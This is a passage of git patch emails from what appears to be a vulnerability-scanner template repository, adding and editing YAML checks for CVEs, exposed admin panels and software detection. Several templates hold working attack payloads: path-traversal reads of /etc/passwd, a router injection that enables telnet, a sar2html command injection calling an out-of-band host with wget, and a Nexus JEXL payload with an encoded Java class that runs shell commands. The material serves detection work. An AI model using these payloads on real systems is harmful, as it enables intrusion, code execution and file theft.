'"operating_system"' - 'Bazarr' - + - type: status status: - 200 From 6d3e183ea6ac241f89da22c37337586428b993a4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 12 Aug 2021 00:44:20 +0530 Subject: [PATCH 1583/4083] Update CVE-2014-4940.yaml --- cves/2014/CVE-2014-4940.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/cves/2014/CVE-2014-4940.yaml b/cves/2014/CVE-2014-4940.yaml index 123662c94a..a2d4666d76 100644 --- a/cves/2014/CVE-2014-4940.yaml +++ b/cves/2014/CVE-2014-4940.yaml @@ -5,9 +5,7 @@ info: author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php. - reference: | - - https://www.exploit-db.com/exploits/45440 - - https://www.cvedetails.com/cve/CVE-2014-4940 + reference: https://www.cvedetails.com/cve/CVE-2014-4940 tags: cve,cve2014,wordpress,wp-plugin,lfi requests: From 83ce96c91543c6d5f38bbb4978f7140af09f91b5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 12 Aug 2021 01:32:57 +0530 Subject: [PATCH 1584/4083] Update hp-service-manager.yaml --- exposed-panels/hp-service-manager.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/exposed-panels/hp-service-manager.yaml b/exposed-panels/hp-service-manager.yaml index 5aa822c516..d48ae98a57 100644 --- a/exposed-panels/hp-service-manager.yaml +++ b/exposed-panels/hp-service-manager.yaml @@ -11,12 +11,13 @@ requests: - method: GET path: - '{{BaseURL}}/sm935/index.do' + - '{{BaseURL}}/sm/ess.do' matchers-condition: and matchers: - - type: word - words: - - 'HP Service Manager: Login' + - type: regex + regex: + - '(?m)HP Service Manager(.*)<\/title>' - type: status status: - 200 From 7138f7cc7f7b7e5b270c42fa48ca822cc46a9b4b Mon Sep 17 00:00:00 2001 From: Prince Chaddha <cyberbossprince@gmail.com> Date: Thu, 12 Aug 2021 01:40:41 +0530 Subject: [PATCH 1585/4083] Update nginx-proxy-manager.yaml --- exposed-panels/nginx-proxy-manager.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/exposed-panels/nginx-proxy-manager.yaml b/exposed-panels/nginx-proxy-manager.yaml index f06fe457af..493ecdfb1e 100644 --- a/exposed-panels/nginx-proxy-manager.yaml +++ b/exposed-panels/nginx-proxy-manager.yaml @@ -20,3 +20,9 @@ requests: - type: status status: - 200 + extractors: + - type: regex + part: body + group: 1 + regex: + - '"page" id="login" data\-version="([0-9.]+)">' From 76e6fbcf8ea80aa044d4764ed48afd188c84a655 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 12 Aug 2021 09:41:00 +0700 Subject: [PATCH 1586/4083] Create CVE-2018-16288.yaml --- cves/2018/CVE-2018-16288.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2018/CVE-2018-16288.yaml diff --git a/cves/2018/CVE-2018-16288.yaml b/cves/2018/CVE-2018-16288.yaml new file mode 100644 index 0000000000..7f8f868002 --- /dev/null +++ b/cves/2018/CVE-2018-16288.yaml @@ -0,0 +1,27 @@ +id: CVE-2018-16288 + +info: + name: LG SuperSign EZ CMS 2.5 - Local File Inclusion + author: daffainfo + severity: high + description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs. + reference: | + - https://www.exploit-db.com/exploits/45440 + - https://www.cvedetails.com/cve/CVE-2018-16288 + tags: cve,cve2018,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From bff5851698e152862ad2b3776f6c192c0b4a74e6 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 12 Aug 2021 09:42:36 +0700 Subject: [PATCH 1587/4083] Create CVE-2010-0944.yaml --- cves/2010/CVE-2010-0944.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-0944.yaml diff --git a/cves/2010/CVE-2010-0944.yaml b/cves/2010/CVE-2010-0944.yaml new file mode 100644 index 0000000000..fed06bf566 --- /dev/null +++ b/cves/2010/CVE-2010-0944.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-0944 + +info: + name: Joomla! Component com_jcollection - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/11088 + - https://www.cvedetails.com/cve/CVE-2010-0944 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From a69a8718c7cd0f95e847530a2c9df34fe9b2ae12 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 12 Aug 2021 14:11:49 +0530 Subject: [PATCH 1588/4083] removing extra headers --- cves/2021/CVE-2021-20091.yaml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/cves/2021/CVE-2021-20091.yaml b/cves/2021/CVE-2021-20091.yaml index 22d2c726b6..8829a72d18 100644 --- a/cves/2021/CVE-2021-20091.yaml +++ b/cves/2021/CVE-2021-20091.yaml @@ -22,13 +22,8 @@ requests: - | POST /images/..%2fapply_abstract.cgi HTTP/1.1 Host: {{Hostname}} - Cookie: lang=8; url=ping.html; mobile=false; Referer: {{BaseURL}}/info.html - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 - Connection: close Content-Type: application/x-www-form-urlencoded - Content-Length: 178 action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4 From 98a07bd5941d933a9cea9a34fd3ef58551a9b0ce Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 12 Aug 2021 14:12:20 +0530 Subject: [PATCH 1589/4083] Added unauth config injection --- .../other/buffalo-config-injection.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 vulnerabilities/other/buffalo-config-injection.yaml diff --git a/vulnerabilities/other/buffalo-config-injection.yaml b/vulnerabilities/other/buffalo-config-injection.yaml new file mode 100644 index 0000000000..8dec57680f --- /dev/null +++ b/vulnerabilities/other/buffalo-config-injection.yaml @@ -0,0 +1,34 @@ +id: buffalo-config-injection + +info: + name: Buffalo WSR-2533DHPL2 - Configuration File Injection + author: gy741 + severity: critical + description: | + The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. + reference: | + - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild + - https://www.tenable.com/security/research/tra-2021-13 + - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 + tags: buffalo,firmware,iot + +requests: + - raw: + - | + POST /images/..%2fapply_abstract.cgi HTTP/1.1 + Host: {{Hostname}} + Connection: close + + action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0A + ARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4 + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "/Success.htm" + + - type: status + status: + - 302 \ No newline at end of file From 2f75d5fd2256d4a6f5040dea5453bd02178ac752 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 12 Aug 2021 14:55:47 +0530 Subject: [PATCH 1590/4083] Update bazarr-login.yaml --- exposed-panels/bazarr-login.yaml | 15 +++++++-------- 1 file changed, 7 insertions(+), 8 deletions(-) diff --git a/exposed-panels/bazarr-login.yaml b/exposed-panels/bazarr-login.yaml index d80cd7c5dc..c88bdb6d51 100644 --- a/exposed-panels/bazarr-login.yaml +++ b/exposed-panels/bazarr-login.yaml @@ -15,7 +15,6 @@ requests: Connection: keep-alive Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 - X-API-KEY: 20f29876d89bcf390ab9988f9a5f0ecc Sec-GPC: 1 Referer: {{BaseURL}}/system/status Accept-Encoding: gzip, deflate @@ -33,20 +32,20 @@ requests: Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 - matchers-condition: and + matchers-condition: or matchers: - type: word words: - - '"data"' - '"bazarr_config_directory"' - '"bazarr_directory"' - '"bazarr_version"' - - '"operating_system"' - - '<title>Bazarr' + condition: and - - type: status - status: - - 200 + - type: word + words: + - 'Bazarr' + - 'Bazarr is a companion application to Sonarr and Radarr' + condition: and extractors: - type: regex From 283888f13b660b550a812e6c041c7e3b39233f57 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 12 Aug 2021 14:58:59 +0530 Subject: [PATCH 1591/4083] Update CVE-2016-1000139.yaml --- cves/2016/CVE-2016-1000139.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2016/CVE-2016-1000139.yaml b/cves/2016/CVE-2016-1000139.yaml index f7af9ea73a..40f7544abc 100644 --- a/cves/2016/CVE-2016-1000139.yaml +++ b/cves/2016/CVE-2016-1000139.yaml @@ -19,6 +19,8 @@ requests: - type: word words: - '"><"' + - 'input type="text" name="ContactId"' + condition: and part: body - type: word From cfc534af89a841f52cdefdb663ee6934db5ade63 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 12 Aug 2021 15:03:49 +0530 Subject: [PATCH 1592/4083] Update sar2html-rce.yaml --- vulnerabilities/other/sar2html-rce.yaml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/vulnerabilities/other/sar2html-rce.yaml b/vulnerabilities/other/sar2html-rce.yaml index 37b6624dc7..39a55cbf7f 100644 --- a/vulnerabilities/other/sar2html-rce.yaml +++ b/vulnerabilities/other/sar2html-rce.yaml @@ -1,26 +1,24 @@ id: sar2html-rce info: - name: Sar2HTML - Remote Code Execution + name: sar2html 3.2.1 - 'plot' Remote Code Execution author: gy741 severity: critical description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a commend injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system. reference: | - https://www.exploit-db.com/exploits/49344 - tags: sar2html,mirai,rce,oob + tags: sar2html,rce,oob requests: - raw: - | - GET /index.php?plot=;wget http://{{interactsh-url}} HTTP/1.1 + GET /index.php?plot=;wget%20http://{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} User-Agent: python-requests/2.18.4 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive - unsafe: true - matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction From d2fdd5096d36bb647901fc4409c1d161e4d8acca Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 12 Aug 2021 15:07:48 +0530 Subject: [PATCH 1593/4083] Update CVE-2019-12616.yaml --- cves/2019/CVE-2019-12616.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2019/CVE-2019-12616.yaml b/cves/2019/CVE-2019-12616.yaml index 12f581823e..1c3352b08d 100644 --- a/cves/2019/CVE-2019-12616.yaml +++ b/cves/2019/CVE-2019-12616.yaml @@ -23,6 +23,7 @@ requests: words: - "phpmyadmin.net" - "phpMyAdmin" + condition: or - type: regex regex: From 29d78b11b55d28d0a3c8d68664fa2c6f4b5ff402 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Thu, 12 Aug 2021 16:18:42 +0530 Subject: [PATCH 1594/4083] Rename azkaban-web-client-defaulr-creds.yaml to azkaban-web-client-default-creds.yaml --- ...t-defaulr-creds.yaml => azkaban-web-client-default-creds.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename default-logins/azkaban/{azkaban-web-client-defaulr-creds.yaml => azkaban-web-client-default-creds.yaml} (100%) diff --git a/default-logins/azkaban/azkaban-web-client-defaulr-creds.yaml b/default-logins/azkaban/azkaban-web-client-default-creds.yaml similarity index 100% rename from default-logins/azkaban/azkaban-web-client-defaulr-creds.yaml rename to default-logins/azkaban/azkaban-web-client-default-creds.yaml From 65ed503022142a74938ba19c3ae5cee4becf25ba Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 12 Aug 2021 18:41:02 +0700 Subject: [PATCH 1595/4083] Create ewebs-arbitrary-file-reading.yaml --- .../other/ewebs-arbitrary-file-reading.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 vulnerabilities/other/ewebs-arbitrary-file-reading.yaml diff --git a/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml b/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml new file mode 100644 index 0000000000..916a89da14 --- /dev/null +++ b/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml @@ -0,0 +1,29 @@ +id: ewebs-arbitrary-file-reading + +info: + name: EWEBS casmain.xgi arbitrary file reading vulnerability + author: pikpikcu + severity: high + reference: http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%9E%81%E9%80%9AEWEBS/%E6%9E%81%E9%80%9AEWEBS%20casmain.xgi%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html + tags: ewebs,lfi + +requests: + - method: POST + path: + - '{{BaseURL}}/casmain.xgi' + headers: + Content-Type: application/x-www-form-urlencoded + + body: "Language_S=../../Data/CONFIG/CasDbCnn.dat" + + matchers-condition: and + matchers: + - type: word + words: + - "[Edition]" + - "LocalInfo" + condition: and + part: body + - type: status + status: + - 200 From e01f12197478c03ef60ed9e0d43a032bbd72dec2 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 12 Aug 2021 18:48:48 +0700 Subject: [PATCH 1596/4083] Create oneblog-detect.yaml --- technologies/oneblog-detect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/oneblog-detect.yaml diff --git a/technologies/oneblog-detect.yaml b/technologies/oneblog-detect.yaml new file mode 100644 index 0000000000..72fa47957b --- /dev/null +++ b/technologies/oneblog-detect.yaml @@ -0,0 +1,24 @@ +id: oneblog-detect + +info: + name: OneBlog Detect + author: pikpikcu + severity: info + tags: tech,oneblog + +requests: + - method: GET + path: + - "{{BaseURL}}/passport/login/" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "OneBlog开源博客后台管理系统" + + - type: status + status: + - 200 From 1d8ed811d3a578978785c59b07b15481e775ba2c Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 12 Aug 2021 19:30:35 +0700 Subject: [PATCH 1597/4083] Create CVE-2019-7238.yaml --- cves/2019/CVE-2019-7238.yaml | 36 ++++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2019/CVE-2019-7238.yaml diff --git a/cves/2019/CVE-2019-7238.yaml b/cves/2019/CVE-2019-7238.yaml new file mode 100644 index 0000000000..f773bd8f6b --- /dev/null +++ b/cves/2019/CVE-2019-7238.yaml @@ -0,0 +1,36 @@ +id: CVE-2019-7238 + +info: + name: NEXUS < 3.14.0 Remote Code Execution + author: pikpikcu + severity: critical + tags: cve,cve2019,nexus,rce + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2019-7238 + - https://github.com/jas502n/CVE-2019-7238 + +requests: + - raw: + - | + POST /service/extdirect HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0 + Accept: */* + Content-Type: application/json + X-Requested-With: XMLHttpRequest + Content-Length: 7258 + Connection: close + + {"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n 3054\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"} + + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + + - type: status + status: + - 200 From df65ba694b6be360790a77301df16d2b63bc3fea Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 12 Aug 2021 18:19:22 +0530 Subject: [PATCH 1598/4083] Update ewebs-arbitrary-file-reading.yaml --- vulnerabilities/other/ewebs-arbitrary-file-reading.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml b/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml index 916a89da14..e83d14ce2c 100644 --- a/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml +++ b/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml @@ -21,9 +21,10 @@ requests: - type: word words: - "[Edition]" - - "LocalInfo" + - "[LocalInfo]" condition: and part: body + - type: status status: - 200 From 189f62a96fec47c4d69c9f5f98c4b34a961a71e6 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 12 Aug 2021 18:21:19 +0530 Subject: [PATCH 1599/4083] Update CVE-2019-7238.yaml --- cves/2019/CVE-2019-7238.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-7238.yaml b/cves/2019/CVE-2019-7238.yaml index f773bd8f6b..9fe61e4ea9 100644 --- a/cves/2019/CVE-2019-7238.yaml +++ b/cves/2019/CVE-2019-7238.yaml @@ -8,7 +8,7 @@ info: reference: | - https://nvd.nist.gov/vuln/detail/CVE-2019-7238 - https://github.com/jas502n/CVE-2019-7238 - + requests: - raw: - | From 39e0fd7c543b339d1b06af2f2bc2ba45a2850cb6 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 12 Aug 2021 07:55:11 -0500 Subject: [PATCH 1600/4083] Update general-tokens.yaml Nuking more false positives --- exposures/tokens/generic/general-tokens.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/tokens/generic/general-tokens.yaml b/exposures/tokens/generic/general-tokens.yaml index 142665eae3..0516c4ce0d 100644 --- a/exposures/tokens/generic/general-tokens.yaml +++ b/exposures/tokens/generic/general-tokens.yaml @@ -26,7 +26,7 @@ requests: part: body regex: - '(?i)key(up|down|press|boardnavigation)' - - '(?i)password(lessauth|requirementsashtmllist|emailnotfoundmessage|label|errormessage|message)' + - '(?i)password(lessauth|requirementsashtmllist|emailnotfoundmessage|label|errormessage|message|_checkemail_title|_newfield_retype|_text_new|login_submit|_has_expired_title|_has_expired_text)' - '(?i)keys_(close|previous|next|zoom|play_pause)' condition: or negative: true From f3a758c46142a598a6fbc6fb5cce86ff0af6c28c Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 12 Aug 2021 18:42:02 +0530 Subject: [PATCH 1601/4083] removing extra headers --- cves/2019/CVE-2019-7238.yaml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/cves/2019/CVE-2019-7238.yaml b/cves/2019/CVE-2019-7238.yaml index 9fe61e4ea9..8561aa1c8a 100644 --- a/cves/2019/CVE-2019-7238.yaml +++ b/cves/2019/CVE-2019-7238.yaml @@ -14,12 +14,8 @@ requests: - | POST /service/extdirect HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0 - Accept: */* Content-Type: application/json X-Requested-With: XMLHttpRequest - Content-Length: 7258 - Connection: close {"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e6